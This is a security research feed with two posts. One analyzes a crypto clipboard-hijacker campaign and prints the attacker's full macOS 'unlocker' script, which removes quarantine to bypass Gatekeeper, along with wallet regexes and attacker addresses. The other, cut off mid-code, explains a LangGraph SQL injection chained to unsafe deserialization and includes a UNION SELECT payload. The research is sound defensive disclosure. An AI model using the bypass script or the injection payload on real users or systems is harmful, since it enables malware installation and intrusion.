Normal view

Received — 18 June 2026 Check Point Research

From Stars to Upvotes: Fake Reputation Fueling a Crypto Clipboard Hijacker

17 June 2026 at 15:38

Key Points

  • The threat actor uses multiple channels to promote and distribute a Rust clipboard hijacker, starting with a dedicated phishing page as the central hub and extending to GitHub and SourceForge projects promoted by fake accounts. A dedicated YouTube channel, using AI‑generated narrators, suspicious view spikes, and highly positive (likely coordinated) comments, further reinforces the illusion of popularity and trustworthiness.
  • In addition, the threat actor’s tools were also promoted through posts on legitimate news websites. These articles appear to be either paid/promoted posts or content published via compromised news outlets, giving the malware extra legitimacy by placing it alongside trusted news content.
  • The same illusion mechanism extends to VirusTotal, where some samples from this campaign receive benign votes and “safe” comments. Combined with the already low detection rate, this creates a misleading impression of safety that can influence both end users and reputation‑based detection systems.


Introduction

In this research, we analyze a clipboard hijacker campaign that is hidden inside a collection of “solutions” and “tools” that claim to give users an unfair advantage. These offers include Solana and Pump.fun sniper bots (automated tools that try to buy new tokens or meme coins faster than other traders), Aviator Predictor (software that claims to predict the outcome of the popular “Aviator” multiplier game), and several crash‑game “predictors” (programs that supposedly forecast when online betting games will stop and “crash”). The operation mainly targets users who are looking for shortcuts and quick profits—particularly crypto owners and online crash‑game gamblers and traders who are attracted by promises of automated gains and “predictable” outcomes.

To make this operation look legitimate and attractive, the threat actor has built an ecosystem across several platforms. A WordPress phishing site serves as the main landing page, while GitHub and SourceForge projects are used to host and distribute the files. These repositories show inflated engagement—such as high numbers of stars, forks, ratings, and downloads—likely generated by “Ghost Networks” of fake accounts. A YouTube channel, featuring AI‑generated narrators and suspicious spikes in views, promotes the same tools and adds another layer of social proof. In addition, the actor abuses sentiment and reputation signals on VirusTotal, where some samples from this campaign receive benign votes and “safe” comments. Combined with the already low detection rate, this creates a misleading impression of safety that can influence both end users and reputation‑based detection systems.

Behind this social‑engineering and promotion layer, the actual payloads delivered to victims are Rust‑based clipboard hijackers for both Windows and macOS. These binaries install persistence, continuously monitor the clipboard for strings that look like cryptocurrency wallet addresses, and replace them with attacker‑controlled wallets from large, embedded lists. The attacker‑controlled cryptocurrency wallets appear to have received multiple transactions, providing the actor with notable illicit gains.


Phishing Page

This phishing website promotes a mix of “edge” tools that all promise easy, unfair advantages. On one side, Solana / Pump.fun / DEX sniper bots claim they can automatically buy and sell new meme coins faster than other traders. On the other, Aviator Predictor and several Crash Predictors pretend to “decode” or “predict” crash‑game results so users can supposedly win more often. In most cases, victims are funneled to this site through links shared on social media, crypto forums, and Telegram channels. The clear targets are crypto owners, gamblers, and traders who are already looking for shortcuts and quick, automated gains.

Figure 1 — Phishing page.

The WordPress author is @JoseCmanXD, and the same name is used for the Telegram contact provided on the website.

Figure 2 — Telegram account provided in phishing page.

From the website, the actor provides links to GitHub, SourceForge, and YouTube. Across these platforms, the associated content shows inflated engagement, including likely manipulated views and interactions, making the tools appear more popular and trustworthy than they really are.

This inflated engagement appears to be driven by the threat actor’s use of multiple Ghost Networks on each platform. These Ghost Networks consist of fake or low-quality accounts and channels that repeatedly promote his tools, boost view counts, and generate likes or comments, thereby creating a false sense of credibility and social proof for potential victims.


GitHub & SourceForge

The actor appears to operate at least six GitHub accounts to promote and distribute his malicious software. These accounts also seem to collaborate with each other, as they are sometimes listed as contributors to one another’s repositories.

Figure 3 — GitHub account.

The main accounts attributed to the threat actor are Decryptor-j, crash-predictor1, roblox-script1, hack-scripts, and stake-mines. Many of their repositories have received multiple stars and forks from various accounts. This activity appears to be the result of the threat actor’s use of GitHub Ghost Networks, where controlled or fake accounts repeatedly star and fork the repositories to create an illusion of popularity and trustworthiness.

Figure 4 — Repository with 146 stars and 62 forks.

In total, just from GitHub, there appear to be just over 5,000 downloads and potential infections originating from the accounts mentioned above. Of these, over 1,250 downloads are associated with the macOS version of the promoted software “Aviator Predictor”, also indicating an impact on Mac users. When we also consider downloads originating from other platforms and the phishing website itself, the overall number of downloads and potential infections significantly exceeds the figures observed on GitHub alone.

In addition to GitHub, the threat actor also promotes another similar platform on the phishing page, SourceForge. SourceForge allows users to rate projects and leave comments. On this platform, we again observe fake or coordinated accounts posting highly positive feedback, similar to the behavior seen on other platforms that support user engagement. This activity further reinforces a misleading impression of legitimacy and reliability around the malicious tools.

Figure 5 — Positive engagement.

In general, SourceForge appears to have a smaller number of ghost accounts operating on its platform compared to other services observed in previous cases. Although we see relatively few comments or reviews, the download statistics seem highly manipulated, with a total of 44,485 downloads, the majority of which appear to originate from Pakistan and India.

Figure 6 — SourceForge download statistics.

It is interesting to note that the majority of downloads (37,460) appear to come from devices running Android. This is highly suspicious, as the developer currently offers only Windows and macOS versions. We cannot fully confirm this hypothesis, but a plausible explanation is the use of an Android farm to artificially inflate the download count on SourceForge.


YouTube & AI Usage

Another platform promoted through the phishing site is a YouTube channel showcasing the advertised “software” solutions. The videos have a relatively high number of views and likes, which likely helps attract additional victims and convinces them of the supposed effectiveness of these tools. Some older videos appear to target a Russian-speaking audience, suggesting that the threat actor initially focused on Russian-speaking user communities. More recent videos, however, appear to target a broader, global audience by using English.

Figure 7 — YouTube Channel.

Through the actor’s YouTube account, we again observe contact details that link the channel back to the WordPress site and the Telegram account @JoseCmanXD, further strengthening the attribution between these platforms and the same threat actor.

Figure 8 — Channel contact details.

The videos have a substantial number of views, however, their view counts do not show organic growth. Instead, we observe suspicious spikes in views, which is consistent with the use of YouTube Ghost Networks, where bot accounts artificially engage with the videos to inflate view numbers and make them more attractive to potential viewers.

Figure 9 — Suspicious view spikes, artificially inflated views.

In the comment section, we observe highly positive engagement that is likely used to lure potential victims and make them trust the effectiveness of the showcased solution. Many of these accounts appear to be Ghost Accounts that are used to generate fake views and artificial engagement. We also observe comments from potentially real users complaining about the actual effectiveness of the tools, which further indicates that the promoted software does not work as advertised.

Figure 10 — Positive engagement.

The YouTube video is styled to look like a genuine personal tutorial. It shows a desktop screen with visible mouse movements, as if a real user is demonstrating the “software” in real time. At the same time, an AI-generated narrator appears in the bottom-right corner, providing continuous instructions. This combination of on-screen activity and synthetic presenter is likely used to build trust and make the demonstration appear more authentic and convincing to potential victims.

Figure 11 — AI Generated Narrator.

The use of AI by cybercriminals is not limited to AI-assisted malware. Threat actors are constantly trying to incorporate these new technologies throughout the entire attack chain, including phishing, social engineering, content generation, and delivery mechanisms.


VirusTotal Upvotes Manipulation

Check Point Research has observed that some VirusTotal accounts post community comments and cast benign votes in an attempt to portray clearly malicious Indicators of Compromise (IOCs) as harmless. When this sentiment manipulation coincides with low antivirus detection rates, reputation-based detection systems may be more likely to misclassify these IOCs as benign, potentially allowing them to bypass security controls.

Reputation-based detection allows security teams to make fast, risk-informed decisions about files, URLs, and other network indicators by leveraging global threat intelligence, rather than relying solely on local detections. A key contributor to this intelligence ecosystem is VirusTotal, which aggregates malware and phishing indicators from dozens of security engines and community submissions. This shared visibility helps security vendors rapidly identify emerging threats and malicious infrastructure, strengthening reputation models when combined with their own telemetry and behavioral detection capabilities.

Figure 12 — VirusTotal upvotes and safe comment.

This specific threat actor has incorporated multiple Ghost Network services across GitHub, SourceForge, YouTube, and even VirusTotal. We systematically observed samples downloaded from the phishing site that not only had a low detection rate, but also showed positive engagement on VirusTotal, including upvotes and comments describing the binary as safe. This coordinated activity is likely intended to reduce suspicion and increase victims’ trust in the malicious files.

Figure 13 — VirusTotal upvotes and safe comments, through multiple samples.

While the low detection rate itself is not caused by the positive engagement, the combination of low detections and seemingly positive community feedback creates a strong, but false, impression of safety.


Promotion via News Sites & Forums

While searching for traces of the Telegram handle @JoseCmanXD, we also found references on legitimate news websites. These posts appear to be advertisements promoting the tool’s supposed capabilities and include links back to the phishing page, further luring potential victims into downloading the malicious software.

Figure 14 —The National Law Review, decryptor post.

Such posts could potentially be used to further legitimize the tool and make it appear trustworthy, as its capabilities are being advertised on legitimate news websites. This kind of exposure can mislead users into believing the solution is safe and reputable, when in reality it is part of a malicious campaign.

By searching further, we identified additional related posts from other news-oriented sources. All of these posts appear to have been published on the same day, April 27, 2026, suggesting a coordinated effort to promote the malicious tool within a short time frame.

Figure 15 — Google search results.

The majority of these posts have since been taken down and now appear only as remnants in Google search results. It is unclear whether the threat actor published them through paid advertisements that were later removed by the news outlets after being notified of their malicious nature, or whether there is a malicious service—or a set of compromised news outlets—that offers this kind of fraudulent promotion on legitimate websites.

Beyond using news outlets, the actor also promotes the malicious tool on various forums, particularly those frequented by the targeted audience, such as cryptocurrency-focused communities.

The actor posted on BitcoinTalk.org a long-running online forum founded in the early days of Bitcoin, where users discuss cryptocurrencies, blockchain technology, mining, and related projects. While the site itself is legitimate and historically significant in the crypto community, anyone can post content, including promotions, investment opportunities, and potential scams.

Figure 16 — Bitcoin-related forum post.

Early signs of the actor’s activity were found on a hacking forum where the user has been active since 2019. In 2022, the user created a post titled BLACKHAT | Bitcoin Stealer | Advanced Builder | Tutorial | Clipper [Address Changer]+Re-Fud method, in which he shared a malicious crypto-related tool.

Figure 17 — @JoseCmanXD CryptoRipper.

In addition to providing this malicious tool, the same account has shown interest in other topics such as GET UNLIMITED YOUTUBE VIEWS FREE. This activity could help explain the unusually high view counts and abnormal view spikes observed on the associated YouTube content.


Windows Version

The ‘solutions’ are downloaded as a ZIP archive and contain multiple files, the majority of which are unused throughout the execution of the malicious program. While the threat actor updates the main malicious sample every few weeks, the rest of the unused samples remain untouched.

SniperBot_Premium(Free)/
├── SniperBot_Premium(Free).exe
├── Sniper_TradingBot.Premium(Trial).exe.config
...
...
├── src/            
│   ├── config/
│   │   └── silkebin.exe
...
...

The victim needs to trigger SniperBot_Premium(Free).exe (or other related name depending on the “solution” promoted). This file is a simple .NET loader which executes the file located in src/config/silkebin.exe.

Figure 18 — Execution of Rust Clipboard Hijacker.

This Windows executable is a Rust-built cryptocurrency clipboard hijacker (clipper). It installs itself for persistence and then continuously monitors the user’s clipboard for cryptocurrency wallet addresses. When it detects a supported address format, it replaces the clipboard contents with an attacker‑controlled wallet address taken from an internal list. The sample achieves persistence by copying itself to %APPDATA%\\silke\\silke.exe and creating a shortcut in the Startup folder so it will automatically run at logon.

The malware creates a hidden window and registers as a clipboard listener using Windows APIs such as AddClipboardFormatListener, OpenClipboard, GetClipboardData, EmptyClipboard, and SetClipboardData. Each time the clipboard changes, it checks whether the new text matches the pattern of a cryptocurrency wallet address (for example, Bitcoin, Ethereum/EVM, Litecoin, Tron, XRP, Cardano, and others) using regular expressions.

If a match is found, the malware replaces the clipboard text with an attacker‑controlled address from a large internal list. This list contains over 15,500 wallet addresses: about 15,000 are Bitcoin-related (5,000 Bitcoin bech32, 5,000 Bitcoin legacy, and 5,000 Bitcoin P2SH), roughly 500 are Ethereum addresses, and the remaining entries include Bitcoin Cash/Gold, Monero, Dogecoin, Cardano, Litecoin, and other cryptocurrencies.

CurrencyRegexAttacker’s Wallets (Count)
Bitcoin Bech32\\b(bc1)[A-Za-z0-9]{26,45}\\b5000
Bitcoin Legacy (P2PKH)\\b(1)[A-Za-z0-9]{26,35}\\b5000
Bitcoin P2SH\\b(3)[A-Za-z0-9]{26,35}\\b5000
Ethereum / EVM\\b(0x)[A-Za-z0-9]{40,46}\\b501
Bitcoin Cash (CashAddr)\\b(q)[A-Za-z0-9]{26,43}\\b1
Bitcoin Cash (full prefix)\\b(bitcoincash:)[A-Za-z0-9]{26,58}\\b1
Bitcoin Gold\\b(btg)[A-Za-z0-9]{26,43}\\b1
Stellar (XLM)\\b(G)[A-Za-z0-9]{26,40}\\b1
Cardano legacy / others\\b(A)[A-Za-z0-9]{26,40}\\b1
Monero (spend key prefix 4)\\b(4)[A-Za-z0-9]{90,98}\\b1
Monero (integrated address)\\b(8)[A-Za-z0-9]{90,98}\\b1
Dogecoin\\b(D)[A-Za-z0-9]{26,35}\\b1
Cardano (Shelley)\\b(addr1)[A-Za-z0-9]{26,108}\\b1
Cardano (Byron)\\b(DdzFF)[A-Za-z0-9]{26,108}\\b1
Litecoin (L-prefix)\\b(L)[A-Za-z0-9]{26,35}\\b1
Litecoin (M-prefix)\\b(M)[A-Za-z0-9]{26,35}\\b1
Litecoin Bech32\\b(ltc)[a-z0-9]{26,68}\\b1
Zcash (t-address)\\b(t1)[A-Za-z0-9]{26,36}\\b1
Tron (TRX)\\b(T)[A-Za-z0-9]{32,37}\\b1
XRP (Ripple)\\b(r)[A-Za-z0-9]{31,38}\\b1

The attacker’s wallets appear to be replaced quite frequently. In many cases, it seems that once a malicious transaction is completed, the attacker swaps the used wallet for a new, “clean” one. Older samples of this variant contain fewer attacker-controlled wallets—typically only one per targeted currency—and also target fewer cryptocurrencies overall. The latest version expands this list to include additional cryptocurrencies that were not previously targeted, such as Bitcoin Gold, Stellar (XLM), Cardano legacy/Byron, and Dogecoin. At the same time, the attacker has removed support for one cryptocurrency in the new variant, Binance Chain.

Below is an example of how victims are tricked into sending money to the attacker’s wallet.

Figure 19 — Clipboard Hijacker, replacing with attacker’s wallet.

macOS Version

Through his website, GitHub-controlled repositories, and SourceForge projects, the threat actor is also targeting macOS users. The “solutions” provided for macOS are aimed at the same audience as the Windows versions, with the same ultimate goal of stealing cryptocurrency from victims.

Figure 20 — macOS cryptocurrency clipboard hijacker.

The victim downloads a ZIP file from one of the sources mentioned above and finds, among other items, an instruction file named !!! READ THIS - RUN UNLOCKER IF APP IS BLOCKED.txt.

!!! READ THIS - RUN UNLOCKER IF APP IS BLOCKED INSIDE THE FOLDER !!

1- In Finder, Control-click (or right-click) unlocker (or unlocker.command).

2- Choose Open from the contextual menu.

3- In the dialog that appears, click Open again.	

 A small Terminal window or dialog will appear. Wait — it will automatically prepare and open HashScanner.

Unlocker Fixes HashScanner when you see an error like

"App is damaged and can't be opened" or "can't be opened because it is from an unidentified developer":

If this does not work, please contact @JoseCmanXD on telegram and include a screenshot of the error.

Thank you!

The instruction file tells the user to run unlocker.command, which automates the process of “fixing” the blocked application. The script searches for .app bundles in the same folder (or uses an app dragged onto it), removes the macOS quarantine attribute using xattr -cr, and then launches the chosen application with open. By wrapping this logic in simple dialogs and messages, the attacker makes it easy for non-technical users to bypass Gatekeeper warnings and run the malicious app.

#!/bin/bash
# unlocker.command - auto unlocker for .app bundles in the same folder
# Double-click this file in Finder (or drag an .app onto it) to remove quarantine and open the app.

# Get the directory where this script lives (works when double-clicked)
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

# If user passed one or more args (drag-drop), use those instead of auto-search
if [ $# -gt 0 ]; then
  targets=()
  for a in "$@"; do
    targets+=("$a")
  done
else
  # Find .app bundles in the same folder (only top-level)
  targets=()
  while IFS= read -r -d $'\\0' f; do
    targets+=("$f")
  done < <(find "$DIR" -maxdepth 1 -type d -name "*.app" -print0)
fi

# Helper to show macOS dialog
show_dialog() {
  /usr/bin/osascript -e "display dialog $1 buttons {\\"OK\\"} with title \\"Unlocker\\""
}

# No apps found
if [ ${#targets[@]} -eq 0 ]; then
  /usr/bin/osascript -e 'tell app "Finder" to display dialog "No .app found in the same folder. Please place your .app (e.g. HashScanner.app) in the folder with this Unlocker and double-click again, or drag the .app onto this Unlocker." buttons {"OK"} with title "Unlocker"'
  exit 1
fi

# If exactly one target, use it automatically
if [ ${#targets[@]} -eq 1 ]; then
  chosen="${targets[0]}"
else
  # Multiple: ask user to choose via AppleScript list
  # Build a quoted list of basenames for Applescript
  applescript_list=""
  for f in "${targets[@]}"; do
    name="$(basename "$f")"
    # escape backslashes and double quotes
    esc_name="${name//\\\\/\\\\\\\\}"
    esc_name="${esc_name//\\"/\\\\\\"}"
    if [ -z "$applescript_list" ]; then
      applescript_list="\\"$esc_name\\""
    else
      applescript_list="$applescript_list, \\"$esc_name\\""
    fi
  done

  chosen_name=$(/usr/bin/osascript <<AS
set theList to { $applescript_list }
set chosen to choose from list theList with prompt "Choose the app to unlock and open:" default items {item 1 of theList}
if chosen is false then
  return "CANCEL"
else
  return item 1 of chosen
end if
AS
)

  if [ "$chosen_name" = "CANCEL" ]; then
    /usr/bin/osascript -e 'display dialog "No app selected. Exiting." buttons {"OK"} with title "Unlocker"'
    exit 0
  fi

  # find the full path that matches the chosen base name
  chosen=""
  for f in "${targets[@]}"; do
    if [ "$(basename "$f")" = "$chosen_name" ]; then
      chosen="$f"
      break
    fi
  done

  if [ -z "$chosen" ]; then
    /usr/bin/osascript -e 'display dialog "Selected app not found. Exiting." buttons {"OK"} with title "Unlocker"'
    exit 1
  fi
fi

# Final safety check: chosen is a directory and ends with .app
if [ ! -d "$chosen" ]; then
  /usr/bin/osascript -e 'display dialog "The selected item is not an application. Exiting." buttons {"OK"} with title "Unlocker"'
  exit 1
fi

# Run xattr -cr and open. Both commands are absolute paths to avoid PATH issues.
/usr/bin/printf "Removing quarantine from: %s\\n" "$chosen"
/usr/bin/xattr -cr "$chosen" 2>/dev/null
ret=$?
if [ $ret -ne 0 ]; then
  /usr/bin/osascript -e 'display dialog "Failed to remove quarantine (permission or other error). You can try running this script from Terminal for more details." buttons {"OK"} with title "Unlocker"'
  # still attempt to open so user can try
fi

/usr/bin/printf "Opening: %s\\n" "$chosen"
/usr/bin/open "$chosen"

# Let user know we're done
/usr/bin/osascript -e 'display dialog "Done — the app was unlocked (if possible) and opened." buttons {"OK"} with title "Unlocker"'
exit 0

Similar to its .NET Windows variant, the main program on macOS is also just a loader that executes another file located in nested folders.

The executed file is a malicious macOS executable written in Rust that acts as a cryptocurrency clipboard hijacker (clipper). Its main loop monitors the macOS pasteboard, detects wallet-like strings using embedded regular expressions, and replaces them with hardcoded attacker-controlled wallet addresses bundled inside the binary.

To maintain persistence, the malware writes a shell script wrapper to ~/launch.sh and installs a RunAtLoad and KeepAlive LaunchAgent plist at ~/Library/LaunchAgents/com.example..plist, causing launchd to silently re-execute the binary on every login and restart it if it dies. A 30-second watchdog loop (mw_watchdog_copy_and_relaunch) continuously re-writes both files and clones the binary via fcopyfile, making the persistence self-healing against manual removal without first killing the process.

The macOS variant appears to be closer in design to the older Windows version, where each regular expression pattern is associated with only a single attacker-controlled wallet address, rather than multiple addresses per currency.

Coin familyRegex patternAttacker’s Wallet
Bitcoin (BTC)\\b(bc1)[A-Za-z0-9]{26,45}\\bbc1qr8vgrcvacyea68gk6w0kdzt2xcc93azzhalyjl
Bitcoin (BTC)\\b(1)[A-Za-z0-9]{26,35}\\b1JKeTeM7H3P1hj2DYB6vnXWeJ7XgKvXb7D
Bitcoin (BTC)\\b(3)[A-Za-z0-9]{26,35}\\b3EBa4JbKY3HJx6KZopR1sV1upEvxm3dwR1
Bitcoin Cash (BCH)\\b(q)[A-Za-z0-9]{26,43}\\bqp5c3syh4t750jwpljzdmnndddlj7zg64gjhxgm8nd
Bitcoin Cash (BCH)\\b(bitcoincash:)[A-Za-z0-9]{26,58}\\bbitcoincash:qzn9dpl6fs7ywue3ms2wpcjad3wwmax8xgqtkdr7pd
Bitcoin Gold (BTG)\\b(btg)[A-Za-z0-9]{26,43}\\bbtg1q4v9xfvgv4792cg394dmfz8ctd2hhu5xgype2ty
Ethereum / EVM (ETH‑style)\\b(0x)[A-Za-z0-9]{40,46}\\b0x22f24a22b6f824E9ef76B05B186c4D0C2Df58d67
Monero (XMR)\\b(4)[A-Za-z0-9]{90,98}\\b48SWwQ7QUSSPhHS9zWF9V9TKyK7FZVxDd9LghKbbkkYzB3AbhyKaCozMc26siguA2b6tce6tztCTXCWgyrypBLmW7HRxs6D
Monero (XMR)\\b(8)[A-Za-z0-9]{90,98}\\b8BWn9uaExAu2YP3duvbYR2jYfVXMUqnTQYPizkEz1EWrKCGA9Mk912fE3XeZ3P77wTAVp2yDmcKuWiXos6JRAgRtKGijrza
Binance Chain (BNB)\\b(bnb)[A-Za-z0-9]{26,44}\\bbnb1aj96a2f8655rl2hdrzghlagjpe2nm40tp7jq2v
Dogecoin\\b(D)[A-Za-z0-9]{26,35}\\bDDrusqzPjEovYyFrtDV8PVZVZDFFvpGAkc
Cardano (ADA)\\b(addr1)[A-Za-z0-9]{26,108}\\baddr1qytkt94c60hcg27hd9n3zgejxlha6c0v0rpaufgrvxzprkshvktt35l0ss4aw6t8zy3nydl0m4s7c7xrmcjsxcvyz8dqxlg07g
Cardano (ADA)\\b(Ae2)[A-Za-z0-9]{26,105}\\bAe2tdPwUPEZE9kTmNo42ADPop6fXgrSU81n8EERR2ELyCMDh4jrGC4K514q
Cardano (ADA)\\b(DdzFF)[A-Za-z0-9]{26,108}\\bDdzFFzCqrht6dsYcpUFCaMmtBZx7kWS62kBBBiQuaJgW6VJYqfk3hhNNmvL4Zup8pDr32J7JSrG7Pkk77cFFe3H73C5j65tDKTfVp9YV
Litecoin (LTC)\\b(L)[A-Za-z0-9]{26,35}\\bLS6vZukRTqjHtC3ZVYjzPDsiK6UdWdxuhg
Litecoin (LTC)\\b(M)[A-Za-z0-9]{26,35}\\bMJjPAnpe83WAoEFsdLJUKi76GeHx9HkYoU
Litecoin (LTC)\\b(ltc)[a-z0-9]{26,68}\\bltc1qxa03u2udf0a6znuhrrxc6wc4q28wmceh8muqyl
Zcash (ZEC)\\b(t1)[A-Za-z0-9]{26,36}\\bt1RH2YT8Mdo4VJL2tdkkw71N751K5Gc5AGR
TRON\\b(T)[A-Za-z0-9]{32,37}\\bTBFqTqF17fRvSXDh7U8k5mVFxjqkKrWUXm
XRP\\b(r)[A-Za-z0-9]{31,38}\\brfzq3PnZAt6eFKcJ9TXHsAm2c8GuguHUc1
Altcoin\\b(G)[A-Za-z0-9]{26,40}\\bGYzpABfDYfSXq3tq64u8v33zcT71Wy1dsG
Altcoin\\b(A)[A-Za-z0-9]{26,40}\\bAYVNJxRrfpLKVPCkzVKtkq5rTDUhst7KtQ
Solana\\b[A-Za-z0-9]{44}\\b7UQuwTTbZ9SoMY1E8D3DMyPjFCPCXjED2wcj8uhshyzW


Conclusion

In conclusion, this operation combines simple but effective malware with strong social engineering and aggressive cross‑platform promotion. A WordPress phishing site, manipulated engagement on GitHub and SourceForge, AI‑driven YouTube videos, VirusTotal sentiment abuse, and even posts on news outlets and crypto forums all work together to make the tools appear popular, legitimate, and safe. The updated Ghost Networks model is designed to repeatedly expose the victim to positive signals (stars, comments, votes, “safe” labels) so that, by the time they run the tool, it feels like a normal, benign application rather than a threat.

From a user’s perspective, the ability to manipulate sentiment and reputation on platforms like VirusTotal marks an important evolution in how threat actors shape trust. Even if this campaign is not primarily aimed at large enterprises, it shows that attackers no longer rely only on classic malware distribution techniques to reach victims. Instead, they can manipulate reputation systems, crowd‑sourced feedback, and cross‑platform promotion to lower suspicion and attract more users.

These techniques can also be abused by other types of actors distributing and promoting information stealers or other malware families, which can eventually lead to full ransomware compromises in more mature environments. In other words, the same playbook of fake reputation and broad promotion can be reused to deliver more damaging payloads over time.


Indicators of Compromise

DescriptionValue
Clipboard Hijacking Malware5518942d9d21794aaeff41a01b88606a96659fc329b481a2f0946d8163ab4d61
33c86ecfc324de3af97150bd009aba7925a6ba7a0842e127e94cf351013c0fe6
7a7ad4ae347a3f99f3773a113d9f70ecfa967100c96e8275bd1df833caee68d1
bad8625087a7b9453c70933c0db32518ff5818e3d83f3a9e78d432a22b383edb
c1435847b0c437f91efb07a3a35e4468036322d7acf4ba9e6d363cec0b481241
ef9a915c8e1d484e52b3287c94a58ecd22c07391a87f9c136eabd8397ed01ca2
5518942d9d21794aaeff41a01b88606a96659fc329b481a2f0946d8163ab4d61
e02e60a23297692637b43ebcd7dbeb63af1e9680c551586a1ce935218e0034be
fb8294b12f904dff2ac79b51872be7bf09ab422cde223caaf4762eadf7e0760d
a91c09e0eea610dbe5879798f9cf12e3ce51e4e6f0893278bcdf3ebe22c4730b
9c566db1ef9d08ee389d2b8cc1c50c65870096130c8bd2cf41ea14c4075e94c0
.NET Loaderf737e99177cc05037ff34cf6e245dd56377dc3db4e2bb46edcf039df650939d6
7a9632bbecc31d02fdd0eab07e2424b3e1c9e9a3f91aac4ef6f708f2befbaa3d
MacOS Clipboard Hijacking Malwareb71efdebd0ca3563e67edb7ad59358a6b8f013b219ad65033efcf48fd1c86619
MacOS Loader6f12c066a929c96104796c4ecca938754962009ebd9e4ba5329bb940bf331d0a

The post From Stars to Upvotes: Fake Reputation Fueling a Crypto Clipboard Hijacker appeared first on Check Point Research.

From SQLi to RCE – Exploiting LangGraph’s Checkpointer

11 June 2026 at 15:37

By Yarden Porat

AI agents need memory. Frameworks like LangGraph provide it through checkpointers – persistence layers that store execution state. But what happens when that persistence layer isn’t locked down?

Key Points

  • Check Point Research analyzed LangGraph, an open-source framework for stateful AI agents with over 50 million monthly downloads, and uncovered three vulnerabilities in its persistence layer.
  • Two of them chain into remote code execution: a SQL injection in the SQLite checkpointer (CVE-2025-67644) and an unsafe msgpack deserialization (CVE-2026-28277).
  • A third, parallel issue (CVE-2026-27022) introduces the same injection class into the Redis checkpointer.
  • Who’s at risk: teams self-hosting LangGraph with the SQLite or Redis checkpointer, where the application exposes get_state_history() with a user-controlled filter. LangChain’s managed cloud service, LangSmith Deployment (formerly LangGraph Platform), runs PostgreSQL and is not vulnerable.
  • LangChain patched all three issues. Users should update to langgraph-checkpoint-sqlite 3.0.1+, langgraph 1.0.10+, and langgraph-checkpoint-redis 1.0.2+.

Background

LangGraph is an open-source framework for building stateful, multi-agent AI systems with built-in persistence. It’s an extension of LangChain, with over 50 million monthly downloads according to PyPI stats.

Checkpointers are LangGraph’s persistence layer that stores execution state at each step. LangGraph supports two checkpointer implementations: SQLite and PostgreSQL.

Vulnerability #1: SQL Injection (CVE-2025-67644)

The SQLite Checkpointer Database Schema:
The SQLite checkpointer uses an internal table called checkpoints with the following structure:

CREATE TABLE checkpoints (
    thread_id TEXT NOT NULL,
    checkpoint_ns TEXT NOT NULL DEFAULT '',
    checkpoint_id TEXT NOT NULL,
    parent_checkpoint_id TEXT,
    type TEXT,
    checkpoint BLOB,
    metadata BLOB,
    PRIMARY KEY (thread_id, checkpoint_ns, checkpoint_id)
);

The metadata column stores additional contextual information about each checkpoint in JSON format. For example:

{
  "user_id": "alice",
  "step": 1,
  "source": "input"
}

The list() Function and Filtering:

When calling the list() function on sqliteSaver (the checkpointer), the filter parameter is used to query checkpoints based on their metadata:

def list(
    self,
    config: RunnableConfig | None,
    *,
    filter: dict[str, Any] | None = None,  # Used to filter by metadata
    before: RunnableConfig | None = None,
    limit: int | None = None,
) -> Iterator[CheckpointTuple]:

The filter parameter is passed to an internal function called _metadata_predicate, which constructs the SQL WHERE clause to query checkpoints by their metadata fields.

# process metadata query
    for query_key, query_value in filter.items():
        operator, param_value = _where_value(query_value)
        predicates.append(
            f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
        )
        param_values.append(param_value)

    return (predicates, param_values)

The Injection

The vulnerability exists in how _metadata_predicate handles the query_key from the filter dictionary.
Notice this critical line:

f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"

An attacker-controlled filter could provide a query_key with a ' character that will escape the JSON path string and inject arbitrary SQL code.

Injection -> Arbitrary Deserialization

To understand how SQL injection leads to arbitrary deserialization, we need to see the complete picture.
Here’s the SQL query that gets executed in list():

query = f"""SELECT thread_id, checkpoint_ns, checkpoint_id, parent_checkpoint_id, type, checkpoint, metadata
FROM checkpoints
{where}
ORDER BY checkpoint_id DESC"""

This query retrieves checkpoint data from the database, including the checkpoint’s BLOB column.
The results are then processed:

async for (
    thread_id,
    checkpoint_ns,
    checkpoint_id,
    parent_checkpoint_id,
    type,
    checkpoint,  # ← This comes directly from the SQL query results
    metadata,
) in cur:  # ← cur contains the query results
    # ... 
    yield CheckpointTuple(
        # ...
        self.serde.loads_typed((type, checkpoint)),  # ← Deserialization
        # ...
    )

The checkpoint contains serialized data, and when fetched gets deserialized.

The Attack

Using SQL injection in the WHERE clause, an attacker can inject a UNION SELECT that adds their own row to the query results:

SELECT thread_id, checkpoint_ns, checkpoint_id, parent_checkpoint_id, type, checkpoint, metadata
FROM checkpoints
WHERE ... (injected: ') UNION SELECT 'thread1', 'ns', 'checkpoint1', NULL, 'msgpack', X'', '{}' -- )
ORDER BY checkpoint_id DESC

The injected UNION SELECT returns a fake checkpoint row where the checkpoint column contains attacker-controlled serialized data. When the code loops through the query results, it deserializes this malicious checkpoint’s BLOB, giving the attacker arbitrary deserialization

Vulnerability #2: MsgPack Unsafe Deserialization (CVE-2026-28277)

Now let’s examine what happens during deserialization. The self.serde.loads_typed() function that deserializes checkpoint data looks like this:

def loads_typed(self, data: tuple[str, bytes]) -> Any:
    type_, data_ = data
    if type_ == "null":
        return None
    elif type_ == "bytes":
        return data_
    elif type_ == "bytearray":
        return bytearray(data_)
    elif type_ == "json":
        return json.loads(data_, object_hook=self._reviver)
    elif type_ == "msgpack":
        return ormsgpack.unpackb(
            data_, ext_hook=self._unpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS
        )
    elif self.pickle_fallback and type_ == "pickle":
        return pickle.loads(data_)
    else:
        raise NotImplementedError(f"Unknown serialization type: {type_}")

Formats

  1. Pickle –  is disabled by default
  2. JSON –  The json.loads() with object_hook was discussed in our LangGrinch research, but does not lead to code execution
  3. Msgpack – This is the one we are interested in

What is msgpack?

MessagePack (msgpack) is a binary serialization format designed to be faster and more compact than JSON. LangGraph uses ormsgpack, a Rust-based implementation with Python bindings.

Msgpack Extensions

MessagePack allows developers to define custom extension types to handle additional data types beyond its built-in primitives. LangGraph implemented its own extension handler to support serialization of custom Python objects.

When the type_ is msgpack, the code calls:

ormsgpack.unpackb(data_, ext_hook=self._unpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS)
```
The `ext_hook` parameter points to LangGraph's custom implementation: `_msgpack_ext_hook`.

```python
def _msgpack_ext_hook(code: int, data: bytes) -> Any:
    if code == EXT_CONSTRUCTOR_SINGLE_ARG:
        try:
            tup = ormsgpack.unpackb(
